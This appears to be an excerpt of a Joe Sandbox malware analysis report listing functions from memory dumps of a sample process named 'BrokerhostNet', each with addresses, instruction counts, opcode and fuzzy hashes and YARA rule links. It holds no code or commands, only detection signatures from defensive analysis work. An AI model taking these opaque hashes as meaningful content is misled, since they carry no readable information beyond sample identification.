Instruction ID: 7ff932ff25b48581cc79ba61ca242fe4bf602ddbf6151af02d989f83726be627
Opcode Fuzzy Hash: 4c3699f8532241432373f4e76d1a7e9a9ced952f9e3f9830734c06a5f91736dc
Instruction Fuzzy Hash: 6831253130D9194FE768EB5CE88A9B977D0EF5932130502BBE48AC7176DD51AC8287C5

Function 00007FFD9BEB8A97 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040516d8a0230e1543889edcf41d1ed20b7e20b792347406fa2d2b9e14e6b5c8
Instruction ID: afea51e63f009e1ad1bea4a8831fd9e15fa15d46f859c0f6c54633f708cf9c17
Opcode Fuzzy Hash: 040516d8a0230e1543889edcf41d1ed20b7e20b792347406fa2d2b9e14e6b5c8
Instruction Fuzzy Hash: 3041733270D9088FDF98EF28C4A5DA4B3E1FBA8360B14056AD14EC7292DE21F945CB81

Function 00007FFD9BEB3A67 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f787059cd37bf55edd7809e4fe59553e99cfb1820c4d76a61ef9889507bd58
Instruction ID: 9ae9544197a1e75d04b5332be5ed3b01071661c5ce3f5a5f0cf6fdae3ee3bfd9
Opcode Fuzzy Hash: 33f787059cd37bf55edd7809e4fe59553e99cfb1820c4d76a61ef9889507bd58
Instruction Fuzzy Hash: 6741B23160D9198FDF98EF18C4A6DA4B7E1FF68320B0405AAE05EC7196DE25FC40CB81

Function 00007FFD9BEB8B41 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af01486f8343275171c485c3030b07b30d9e951f2a18b75b75c7ddc77a94e92
Instruction ID: ea96624d7e8c5a7e1d6bb5b2268a0e30875016b858dd86d93b46edf6ff3615f1
Opcode Fuzzy Hash: 2af01486f8343275171c485c3030b07b30d9e951f2a18b75b75c7ddc77a94e92
Instruction Fuzzy Hash: DE31933160CA488FDF9CEF28C4A5D6473E1FFA9354B1406AED04AC72A2DE21F845CB81

Function 00007FFD9BEB3B11 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c8e5340e7dabb7a1298bd52406ed1e5cb2ec63bf562e1de92ffe2f03cc2b8c
Instruction ID: a27c2eef389f2837fca9391097fd06d2b1abc1ca8f4e7a85e22bdfc7392a6ca5
Opcode Fuzzy Hash: 95c8e5340e7dabb7a1298bd52406ed1e5cb2ec63bf562e1de92ffe2f03cc2b8c
Instruction Fuzzy Hash: 1531AF3160C9598FDB98EF18C4A5E64B7E1FF69311B0406AAE05EC7196DE25EC40CB81

Function 00007FFD9BAC095D Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7d58faea76a9ca93a82c150ca6bb3028e728f38e91b977c883fcb7460e2ad9
Instruction ID: 23b413083db68b663286c0bb305ce94b193124154c799514832e3688c1ee9b16
Opcode Fuzzy Hash: ff7d58faea76a9ca93a82c150ca6bb3028e728f38e91b977c883fcb7460e2ad9
Instruction Fuzzy Hash: 32310621B0D55D1FE768B7ACA4B6AF877C1DF58376B1405BAE80EC72E7CD18AC418284

Function 00007FFD9BAC0960 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cece921fec595496d1c4977088639dec4df4ec2a077a950345cd6b2c4322b9fa
Instruction ID: b573241e68be6ddac910a32816a02a8c892ebf470320ddc29219ea99eed12a18
Opcode Fuzzy Hash: cece921fec595496d1c4977088639dec4df4ec2a077a950345cd6b2c4322b9fa
Instruction Fuzzy Hash: 9831F711B0D51D1FE768B7ACA476AF863C1DF5837AB0405BAE80EC71E7CD18AC418285

Function 00007FFD9BEB8ADB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f2687d62afb08b0dfe1dc5d1543de4bfb4d832038cbdc696e5a655069e56652
Instruction ID: 9e819b1076400539ce007bc188e75cea4094b4d615f7ec6babe4be6e29e6ee81
Opcode Fuzzy Hash: 1f2687d62afb08b0dfe1dc5d1543de4bfb4d832038cbdc696e5a655069e56652
Instruction Fuzzy Hash: 4531633170CA098FDF98EF28C4A5DA473E1FF68350B1505AAD04AC7292DE25F945CB81

Function 00007FFD9BEB3AAB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748d40637650f88bbe5154ac9ef342dce10b885ce37675da7a44f1dbdc887f53
Instruction ID: 43ef3ae66bb531670f078f38f3389f8035b5603f4dc344f8fe19e2c328d1a4d1
Opcode Fuzzy Hash: 748d40637650f88bbe5154ac9ef342dce10b885ce37675da7a44f1dbdc887f53
Instruction Fuzzy Hash: E931813160C9198FDB98EF18C4A5EA5B7E1FF69310B0406AAE05EC7196DE25FC41CB81

Function 00007FFD9BAC0998 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6beb08a824355d296ee56c6dab8d155572737ef3316718496cf36cdb26a09012
Instruction ID: 40e75b2f18d70bc06488b273cce77662725bb9035f3b3c134585414592c00174
Opcode Fuzzy Hash: 6beb08a824355d296ee56c6dab8d155572737ef3316718496cf36cdb26a09012
Instruction Fuzzy Hash: C7212420B1D94D1FE798F76C847AB7976C2EF99365F0400B9E40EC32E7DD58AC418245

Function 00007FFD9BAC1171 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c5c8c9a5b94f4585749ead12f5de998f0f0fc765e858d71ab6123dac6d2081
Instruction ID: ef784179c7c186ca819f947500de4e5cb81f515baa3c49a79055b8b7f80b539c
Opcode Fuzzy Hash: 43c5c8c9a5b94f4585749ead12f5de998f0f0fc765e858d71ab6123dac6d2081
Instruction Fuzzy Hash: 1631A430A0D64E8FDB59EBA8C8649B97BF0FF56310B0945FBC049D71A2DA78A941CB40

Function 00007FFD9BEB5CEF Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd718a4023e5e2ffa52bf2f6f74270356511d00c14c5d352523a7ee92313f059
Instruction ID: 047999374f8bb20167962cce3447200ff7cfa4394828635e50d0b7e7a0edd32e
Opcode Fuzzy Hash: dd718a4023e5e2ffa52bf2f6f74270356511d00c14c5d352523a7ee92313f059
Instruction Fuzzy Hash: DE215671F0EA5E4FE769D7A888762A8B7D0FF15310F0502B9D05DC31E2DE1969028B41

Function 00007FFD9BEB7790 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef53a74395676a9c59dd32473e0dba1f3956cc09edc131b5396eef10088d35b3
Instruction ID: 8ebc06d3b26eead93afcd3f09c45c6f79452eecf85993b116436588275a686ca
Opcode Fuzzy Hash: ef53a74395676a9c59dd32473e0dba1f3956cc09edc131b5396eef10088d35b3
Instruction Fuzzy Hash: 08318F10A1E1BA4BE73B835448316B47F59EF5635171A46F6D087CB8F7C81DB941CB81

Function 00007FFD9BEB2760 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b1f15aecff25fec85847cd3bf77a019a3f26ef9933f1794c3513378c2042d4
Instruction ID: ffbfed4ae60d43317efb028252bdc75a372bd7178b62cc3eb33dad926e4d08ed
Opcode Fuzzy Hash: 40b1f15aecff25fec85847cd3bf77a019a3f26ef9933f1794c3513378c2042d4
Instruction Fuzzy Hash: 5B314910E1E5BB4BE73A829598705707F55FF5230071947FAD0AA8B0F7C82DBA809B81

Function 00007FFD9BEB88C1 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7f54e29da3aa60b60dfda98ba36a86160fdaed5bfeac090b3b254fa063a6246
Instruction ID: 6cbb3f9f43fae572bbbda461adcc7d2c32ebed2569d9c6b8904eb12423dcf3a9
Opcode Fuzzy Hash: a7f54e29da3aa60b60dfda98ba36a86160fdaed5bfeac090b3b254fa063a6246
Instruction Fuzzy Hash: 7D312A30A1E52EDBEF68DF95C4615BD76B5FF44300F51017AD01ED22A0DF3A6A409B82

Function 00007FFD9BEB3891 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c96279f137c49cc5adc80ee0b6f7071d37f64d926bcdf7f21c6cc24098f8c3
Instruction ID: b2d3f147a33728e1a8ca9c92ef89ed8b069d60b3094f73d638a8c2b127ff2ddd
Opcode Fuzzy Hash: 25c96279f137c49cc5adc80ee0b6f7071d37f64d926bcdf7f21c6cc24098f8c3
Instruction Fuzzy Hash: 87312C30A1A96EDAEBB9DB8584A25BD77B5FF44300F51017BE01ED21E4DA3A6A009B41

Function 00007FFD9BEB5C38 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe1dc556ac42ce452c1437969d3eaef5abed4583fa25bca10560ff424d589e5
Instruction ID: 3a40147243c82a8c6c45b78c7514ab3918735e735efdc852551699d6501de49b
Opcode Fuzzy Hash: 6fe1dc556ac42ce452c1437969d3eaef5abed4583fa25bca10560ff424d589e5
Instruction Fuzzy Hash: 32218D71B1991E8FDB58DA98C4A19BCF3A2FF54310B118239D01ED3292CF24BD12CB80

Function 00007FFD9BEB4BB2 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e02cda4bc502e896c59d711ab88f3cfdf2020c712ece5a160a376134f407938
Instruction ID: 7d2082884a7c523d24a15bbcd03b2fd21e8c43f7873e753fbda3c3b2bf7f2705
Opcode Fuzzy Hash: 3e02cda4bc502e896c59d711ab88f3cfdf2020c712ece5a160a376134f407938
Instruction Fuzzy Hash: 66311A35A0991D8FDFA8DB58C465AADB7B1FF58300F0141ADD04EE72A1CE35AA41CF40

Function 00007FFD9BEB9A72 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaae1c2f22d1decc7fd7b8d96cd4ef653dae098b7b9834f775994c75f09f3bde
Instruction ID: 26cb587dbdfac1552172ec756120a65beffe415fcd3d46dbcb42838a79580b65
Opcode Fuzzy Hash: aaae1c2f22d1decc7fd7b8d96cd4ef653dae098b7b9834f775994c75f09f3bde
Instruction Fuzzy Hash: C631E935A1991D8FDFA9DB58C4A5AB877B1FF58310F0101ADD01EE72A1CE75AA41CF40

Function 00007FFD9BEB0C31 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12dd844573b55bc402fe53e3368ca69f3a0013119b9db52f745dcbeaa3572a5a
Instruction ID: e3d9b3d2194a789ee0342c041174a96ab55a7c224287eff35189b4111ef0d3f8
Opcode Fuzzy Hash: 12dd844573b55bc402fe53e3368ca69f3a0013119b9db52f745dcbeaa3572a5a
Instruction Fuzzy Hash: 2E21B331B1991E8FD754DA99D4A29B8B3A1FF95710B014139D01ED72A2CF24BD12CB80

Function 00007FFD9BEB77C0 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11df0cd11b16e3a21d0c0687e671fe793442cb8c75a14ab84cd0c272da71093
Instruction ID: a33638483bd889e153ce99d4f63374f17d06bc1e5b0d04eff61a001fdcead5e3
Opcode Fuzzy Hash: b11df0cd11b16e3a21d0c0687e671fe793442cb8c75a14ab84cd0c272da71093
Instruction Fuzzy Hash: 27216620A1E07E8BE73A824584715B47665FF54300B1546BAD14B8B8EBC82CBA81CB81

Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c388266bb217f9c13654dcafe6432f17166514dfc138fd0d0b9b28752213c1
Instruction ID: 10a0bef3469920b341f9d70f6a2bc3777c1235270c3720f62fed7889dd74bec0
Opcode Fuzzy Hash: e0c388266bb217f9c13654dcafe6432f17166514dfc138fd0d0b9b28752213c1
Instruction Fuzzy Hash: 5521F731A0D28D8FE732EBA888602EC7FA0EF51324F1541F7D0448B1E3DA782645CB45

Function 00007FFD9BAC1DD2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5070c69e4481246118748b072fc570055814f4e12fc19197e42d29f08f5c7373
Instruction ID: b884aac7efc01c962d2e5134026f41567cfae780bb138f86aa5e8f05d39290ed
Opcode Fuzzy Hash: 5070c69e4481246118748b072fc570055814f4e12fc19197e42d29f08f5c7373
Instruction Fuzzy Hash: 75115132B0D90D4FEBB4B75898656F86392EF94320F5201B7D40EC31B2DE69AE424685

Function 00007FFD9BEB2790 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dff9618251111215cc0f31cbaa11134c37bed58f499786131baaa78cb485bd4
Instruction ID: 959ba9b1e29880c40981530c197ed19ab2d67bc585e31ade1e53bc01c970d61a
Opcode Fuzzy Hash: 3dff9618251111215cc0f31cbaa11134c37bed58f499786131baaa78cb485bd4
Instruction Fuzzy Hash: 3C11D510E1D47F87F738868994705B47B59FF50301B154A79D46B8B4FAC82DFA819B80

Function 00007FFD9BEB8F41 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85700daeb7082ef5c5caf55791ae413137a07426413923b94b8d6734b9adac4c
Instruction ID: 92caa699e932952bf1020645e14efe63e2e5f904b2cc20f8feb567c8dc83c87a
Opcode Fuzzy Hash: 85700daeb7082ef5c5caf55791ae413137a07426413923b94b8d6734b9adac4c
Instruction Fuzzy Hash: DE212C31E1891EDFDBA8DB99C8606EDB7B2FF58310F500279D00AE3391CA356945DB44

Function 00007FFD9BEB1810 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789c3ba43b17547ab072cb2c72461816c2e4c4839890dd7abc76afff343a0a1d
Instruction ID: ee41d80071d74f9a00560eceacf4916433937abb6bfbc7c901342e68bec670f7
Opcode Fuzzy Hash: 789c3ba43b17547ab072cb2c72461816c2e4c4839890dd7abc76afff343a0a1d
Instruction Fuzzy Hash: B411C421B1990D4FE768EBA594659FA7792FF54329B80077ED14EC34E2CE24B6058780

Function 00007FFD9BEBABC4 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84c7fab3be64a0ee7982d92c6fd613d6d5acf02de109877b5b48302eeb324e6
Instruction ID: f3c8f6c0e1683a59c2ada36a84a72ed9076904f6517d0e3a155a265595596408
Opcode Fuzzy Hash: c84c7fab3be64a0ee7982d92c6fd613d6d5acf02de109877b5b48302eeb324e6
Instruction Fuzzy Hash: 1C110672F0DA4D4FEF58A7A854663E877D5EF55324F111179E01EC22D3DE2A65028780

Function 00007FFD9BEB6840 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e841db7a52202bd5bf45182e36bba9e128989034b7d50dd407d9757ed430dedd
Instruction ID: 0e656b16b7c73876e51801599cb4f0645407e9dc3e434ef6abd41c9fe7795b03
Opcode Fuzzy Hash: e841db7a52202bd5bf45182e36bba9e128989034b7d50dd407d9757ed430dedd
Instruction Fuzzy Hash: A4117621B19A5D4FE768DBA594309F9B381FF94269B80063ED14FC70E2CE28F6058780

Function 00007FFD9BEB168E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ecb515ce830f7a475c9bdccb66fe4c87ee33473fbd7ff0f8d4b0b541f365c2
Instruction ID: 6835039ce976bc2f1542f9075ed58bb8cfd29fe29d786b8744d2c072240740c4
Opcode Fuzzy Hash: 74ecb515ce830f7a475c9bdccb66fe4c87ee33473fbd7ff0f8d4b0b541f365c2
Instruction Fuzzy Hash: 1E11553170954E8FE319CEA8E8646F57B81EF51325F10023FDA0AC31E1CB25A6108B81

Function 00007FFD9BEBB59E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5053577d669d2840dc4983d8e7c0a1aa5fa3dbe92c9f8390a1a698b6dfacd7a1
Instruction ID: 4803c26065d0cfc854ebc8914e0c5fd47130da1db4b9c4ee97eee2e6b659092e
Opcode Fuzzy Hash: 5053577d669d2840dc4983d8e7c0a1aa5fa3dbe92c9f8390a1a698b6dfacd7a1
Instruction Fuzzy Hash: 2311483570958D4FE718CAA994A47B83785DB91311F15027EDA09C71E2D966E644C740

Function 00007FFD9BEB0CF9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40e6262c09a3d07ea4a9a163b4086609881a88661c1f122bc9f26c13b61a8788
Instruction ID: 2fbc3298a18132897acf0d6a1d7514251565ab02aed4536fced156a6d5c99fd0
Opcode Fuzzy Hash: 40e6262c09a3d07ea4a9a163b4086609881a88661c1f122bc9f26c13b61a8788
Instruction Fuzzy Hash: C4012231F0DA5C4FEB94EBE998622ECB7A1FF19310B06017EC04AC32E3CE2469028700

Function 00007FFD9BAC0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d3b986145bc32f3186819bcff93b229f20b9fb29492abf662e043e89e7c74c
Instruction ID: c09e71df8a1b1a4869cf386a8397718c97d013f9b857258ef1add1fd2400058a
Opcode Fuzzy Hash: e5d3b986145bc32f3186819bcff93b229f20b9fb29492abf662e043e89e7c74c
Instruction Fuzzy Hash: 5211A335A0E68D8FE722EB6888602EC7FB0EF52611F0646F7D084DB1A2D57416058B81

Function 00007FFD9BEB9791 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42601984e95d3a42c7ab26c7bf06d5425ae11b3661067f359f6e312fd791a43f
Instruction ID: 31ec969f76e208bb397dfed0122ca1b2d7622b75276824222d391c191f36f4cb
Opcode Fuzzy Hash: 42601984e95d3a42c7ab26c7bf06d5425ae11b3661067f359f6e312fd791a43f
Instruction Fuzzy Hash: 7401841AF0F5BF82F9381DE7243957C518C6F44720F960776E44E960E6DC0F2A811B82

Function 00007FFD9BEB40A8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b110d96cd3219651c99a8a05cc5f3af0b549a0a3955c1153063cd94d19f34dfa
Instruction ID: 943e38a4dd5de5f4cd4a76a79827882a5f25eb3cf1c172b13ac691bbe992a31a
Opcode Fuzzy Hash: b110d96cd3219651c99a8a05cc5f3af0b549a0a3955c1153063cd94d19f34dfa
Instruction Fuzzy Hash: FF11D330E1981EDFCF98DB99D8A09BDB7B1FF58300F500179E00AE72A0CA356941CB51

Function 00007FFD9BAC57D9 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d12ab007ad105223af6f0dae62bd9c290ec154e11a096bf7bcf7c547c51e4e
Instruction ID: 1249f3686e31d554ba94a34405db12f22b5fc793f619cfbfd5bff5e80d858227
Opcode Fuzzy Hash: 71d12ab007ad105223af6f0dae62bd9c290ec154e11a096bf7bcf7c547c51e4e
Instruction Fuzzy Hash: D5012111F1A91E4BFBB4BBA880B527C21C2EF68750F564475D40ED32E2ECAC6E024245

Function 00007FFD9BEB0C68 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b268767231142e5fde4782e71ed1fac21d1ebd0cd48719ab495d2b735ab4427
